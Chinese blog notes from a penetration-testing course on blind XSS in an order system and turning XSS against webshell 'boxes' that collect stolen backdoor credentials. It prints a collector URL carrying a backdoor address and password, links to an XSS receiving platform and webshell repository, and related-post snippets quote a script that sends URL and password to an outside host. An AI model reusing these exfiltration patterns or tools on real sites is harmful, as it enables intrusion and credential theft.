第26天-WEB漏洞-XSS跨站之订单及Shell箱子反杀记

已于 2022-03-14 20:25:28 修改
阅读量1.4k 收藏 2
点赞数
分类专栏: 2020小迪安全—渗透测试学习笔记 文章标签: xss web安全
于 2022-03-11 19:36:34 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/MCTSOG/article/details/123432298
版权
本文探讨了XSS(跨站脚本)漏洞常见存在位置,如留言板、订单系统和反馈系统,并解释了cookie与session的区别。通过案例展示了如何利用XSS获取用户信息,提到了webShell和后门的概念。同时,介绍了利用工具如Postman进行HTTP数据包提交,并提供了相关资源链接。强调了session存储在服务器上的特性,指出XSS平台无法捕获PHPSESSION信息。
摘要由CSDN通过智能技术生成

思维导图

在这里插入图片描述

xss漏洞存在的地方

留言板 评论区 订单系统 意见反馈等

#cookie session
用户凭据:通过凭据可以判断对方身份信息
cookie 存储本地 存活时间较长 小中型
session 会话 存储服务器 存活时间较短 大型

演示案例:

某营销订单系统 XSS 盲打_平台

前端订单界面

在这里插入图片描述

后端管理界面

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

演示这个案例的意图是:了解在什么位置利用xss,从而获取有用信息!

使用xss平台/工具

自己编写代码接收

某 Shell 箱子系统 XSS 盲打_工具

跨站漏洞可以应用在很多方面

webShell 箱子(后门中的后门) 一句话shell ,脚本后门(大马),脚本控制网站,别有用心的人会在脚本中再写上后面,你入侵一个网站之后,你用他的后门脚本对网站进行一个控制,那么入侵网站的信息,你的后门地址,后门密码,会发送到一个地方,俗称 箱子、信封。

在这里插入图片描述

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-XiGfLgiI-1646998304883)(image/QQ截图20220311180354.png)]

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

把你的后门地址和密码传回…

http://www.mumasp.com/xz/sx.asp?u=39.96.44.170/x.asp&p=mumaasp.com

其他参考应用案例-后台权限维持

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

工具 Http/s 数据包提交 Postman 使用

postman软件

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

因为采用的是session验证, 那么xss平台是接收不到PHPSESSION的,

session 是存储在网站服务器的。

涉及资源:

http://xss.fbisb.com/
https://github.com/tennc/webshell
https://www.postman.com/downloads/
https://pan.baidu.com/s/1lIUZvEVXs1du-Bmkt7-abA 提取码:xiao
https://pan.baidu.com/s/13H4N1VTBVwd3t8YWpECBFw 提取码:
xiao

IsecNoob
关注
专栏目录
ChatGPT-Next-Web SSRF漏洞+XSS漏洞复现(CVE-2023-49785)
0xSec
03-14 1609
2024年3月,互联网上披露CVE-2023-49785 ChatGPT-Next-Web SSRF/XSS漏洞,未经身份验证的攻击者可利用此漏洞构造恶意请求获取系统内部敏感信息及配置文件,造成信息泄露。
渗透学习-靶场篇-XSS订单shell箱子反杀
qq_43696276的博客
09-19 2696
这里,我们将综合的利用一下xss平台去进行对之前的某些站点进行攻击。本次将主要利用的是军锋真人cs野战的订单平台进行实验。除此之外,我们还将进行shell箱子反杀过程!!
[小迪安全25-26]xss
weixin_54252904的博客
05-21 528
订单cookie窃取和shell箱子反杀简单测试窃取cookie本地构造实现xss攻击1方法2webshell沙箱反杀反杀操作演示存在后门的大马beef结合xss攻击获取session思路 通过提交订单的方式植入xss来获取网站管理员cookie 简单测试 窃取cookie https://www.postman.com/downloads/下载postman 本地构造实现xss攻击1 本地服务器端39.96.44.170 文件jieshou.php <scri
xss接收平台推荐-xss平台-xss在线平台
最新发布
vetus1的博客
08-12 1160
目录二.XSS在线平台1.访问xss在线数据接收平台:2.创建xss测试项目​编辑3.查看项目对应xss测试代码4.在线功能发送即时代码5.自定义代码的利用6.伪造后台页面测试返回发送明文数据​ 7.延伸搭配自定义代码和发送js搭配模块 自动化钓鱼测试XSS平台-仅用于xss安全测试专用https://d00.cc我们可以看到 有很多返回的信息 包括页面截图 接下来我们测试一下触发效果
小迪安全学习笔--第26web漏洞-xss跨站订单shell箱子反杀
zr1213159840的博客
01-03 545
xss平台及工具使用 postman可以通过获取的cookie登录网站的后台 beef工具必须在linux中才可以使用。 xss经典应用案例测试 webshell后门中的后门 箱子返回的代码中添加后门,然后获取到箱子的cookie后台 session与cookie获取问题 document.cookie等 代码中通过这个函数来获取cookie 配合读取phpinfo等源码信息等 案例演示 某营销订单系统化xss盲打_平台 某shell箱子系统xss盲打_工具 其他参考应用案例-后台权限维持 工具http/.
WEB漏洞-XSS跨站订单Shell箱子反杀
xhscxj的博客
01-23 494
shell箱子 很多人在网上发布大马,他们在大马中写入了后门。当你成功把有后门的大马上传到目标网站上时,大马就会把该网站的url以及密码发送给在大马留过后门的人。 $_SERVER['HTTP_HOST']//获取当前的url $_SERVER['PHP_SELF']//获取当前访问的文件路径 例子:(留后门的方式有很多,也有可能加密,这里只是举一个例子) 因为代码<script src='http://www.xxx.com/index.php?url=$url&pass=$passwor
Web漏洞-XSS跨站订单系统实操-WebShell箱子反杀
ran的博客
03-16 1203
到这里我们就可以联想到,我们可以随便从网上下载一些后门,经过自己的加工加入自己的后门代码之后再重新发布到各类社区或者论坛等平台,取一个牛逼点的名字,当别人利用你的后门来对其它网站进行入侵的时候,你就可以同步获取到他的入侵的网站的信息,就相当于别人在帮我们入侵。因为获取到的网站以及密码等信息会发送到箱子的后台,所以可以想到在密码或者URL等位置插入XSS代码,当管理员查看信封的时候,就可能会触发XSS代码,从而实现反杀。来到网站的后台可以看到刚刚提交的信息被成功上传到了网站的后台。
XSS跨站订单shell反杀
qq_50613938的博客
11-03 301
Webshell箱子:相信很多人都使用过asp或者php的大马,一般这些大马的代码都是加密过的,这就存在一些猫腻了,因为在这些加密过的代码中有着后门代码,这些后门会将你找到的shell发送到他的服务器,就相当于你给别人打工。 废话不多说,实战来演示一下webshell箱子: 1、首先我们搭建一下asp服务器来放置webshell箱子(后门) 2、然后进入我们的后门网页,默认账号密码都是admin 3、随意构造一个一句话木马,然后再一句话木马代码里插入javascript语句来制作后门(调用webshel
26WEB漏洞-XSS跨站订单Shell箱子反杀1
08-03
**XSS跨站脚本攻击详解** XSS(Cross-site scripting)是一种常见的Web应用程序安全漏洞,它允许攻击者在用户浏览器上注入恶意脚本。这些脚本可以劫持用户会话、盗取Cookie、操纵页面内容,甚至进行更复杂的攻击。...
第28WEB漏洞-XSS跨站之WAF绕过及安全修复1
08-03
WEB 漏洞-XSS 跨站之 WAF 绕过及安全修复#常规 WAF 绕过思路标签语法替换特殊符号干扰提交方式更改垃圾数据溢出加密解密算法结合其他漏洞绕过#自动化
95-web漏洞XSS漏洞挖掘.pdf
03-15
95-web漏洞XSS漏洞挖掘
webshell箱子数据
11-12
webshell箱子数据,全部的密码都是1
WEBSHELL箱子系统V1.0.rar
03-24
WEBSHELL箱子系统
2021/12/06 XSS跨站订单shell箱子反杀,beef
weixin_44532761的博客
12-07 444
小迪 https://www.bilibili.com/video/BV1JZ4y1c7ro?p=25 涉及资源 https://github.com/tennc/webshell https://www.postman.com/downloads/ 订单系统XSS盲打-平台 安装网站 有了前人的教训,先删除了源码install的/install.lock 数据库报错 年????,后台进不去,一看验证码加载不出来,而且路径也不对,把lib放进admin试试 ahhhhh鸡汤…不玩了,打开还
26 WEB漏洞-XSS跨站订单Shell箱子反杀
山兔的博客
09-18 361
如果对方是session验证,我们是有方法的,但是比较鸡肋,可以结合辅助文件来进行攻击,有个phpinfo的界面文件,在这个界面存在http_cookie,我们的思路就是让跨站漏洞去访问这个文件,然后对这串源代码进行读取,只需要找到http_cookie,把session的值给拿到就可以,但是这里有个鸡肋的地方,就是这个跨站漏洞能不能实现访问这个phpinfo地址,其实是可以的。我们可以采取盲打,对方有没有这个跨站漏洞,我们不知道,不管三七二十一就是乱插入,就是乱写,跨站语句这里搞一句,那里搞一句。
php shell箱子,ShellWrap
weixin_33873956的博客
03-18 140
软件简介ShellWrap 可以让你在PHP代码里使用强大的 Linux/Unix 命令行工具示例代码:require_once'vendor/autoload.php';useMrRio\ShellWrapassh;//Listallfilesincurrentdirechosh::ls();//Checkoutabranchingitsh::git('check...
php箱子,webshell箱子php版本.rar
weixin_33490603的博客
03-10 336
压缩包 : webshell箱子php版本.rar 列表api.phpconfig.phpindex.php安装说明.txtadmin/config.phpadmin/exit.phpadmin/help.phpadmin/index.phpadmin/login.phpadmin/root.phpadmin/shell.phpdata/1141056911#@!.datimages/0.gifi...
xss跨站订单shell箱子反杀
san3144393495的博客
05-24 952
弹窗1,这是刚刚写的跨站代码语句执行成功了,如果我们写一些可以盗取对方cookie的代码,获取到cookie之后再利用这个cookie去尝试登陆这个后台,可以得到后台的信息,同样后台里面如果说能够进行这个权限提升,我们说的文件上传,尝试文件上传操作拿到网站的webshell,这都是可以进行的后缀操作。这个是可以进行xss漏洞的测试,凡是有这种数据交互的地方,前端有一个数据的接受,后端是数据的显示,这个过程就符合漏洞产生的前提条件,将输入的数据进行个显示,不太推荐那个语句的原因,太明显了,重新访问一下。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值